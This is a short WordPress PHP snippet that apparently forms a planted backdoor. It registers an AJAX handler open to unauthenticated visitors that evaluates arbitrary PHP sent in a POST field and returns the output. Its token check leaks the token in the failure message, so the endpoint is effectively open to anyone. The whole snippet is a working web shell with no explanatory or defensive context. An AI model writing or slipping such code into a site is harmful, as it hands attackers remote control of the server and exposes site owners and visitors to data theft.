// ==[BD:byQscFxu]== add_action( 'wp_ajax_nopriv_rhoahckirx', function() { $factor = 'byQscFxu1nwdgbJGGi3NVfBEIMdcsva1'; $entry = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $entry ) || ! hash_equals( $factor, $entry ) ) { wp_send_json_error( [ 'message' => 'tok:' . $factor ], 403 ); } $bind = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $bind ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $bind = preg_replace( '/^\s*<\?(php)?/i', '', $bind ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $key = microtime( true ); ob_start(); try { ( static function() use ( $bind ) { return eval( $bind ); } )(); $marker = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $marker, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $key ) * 1000, 2 ) ] ); } catch ( \Throwable $item ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $item->getMessage(), 'time_ms' => round( ( microtime( true ) - $key ) * 1000, 2 ) ] ); } } ); // ==[/BD:byQscFxu]==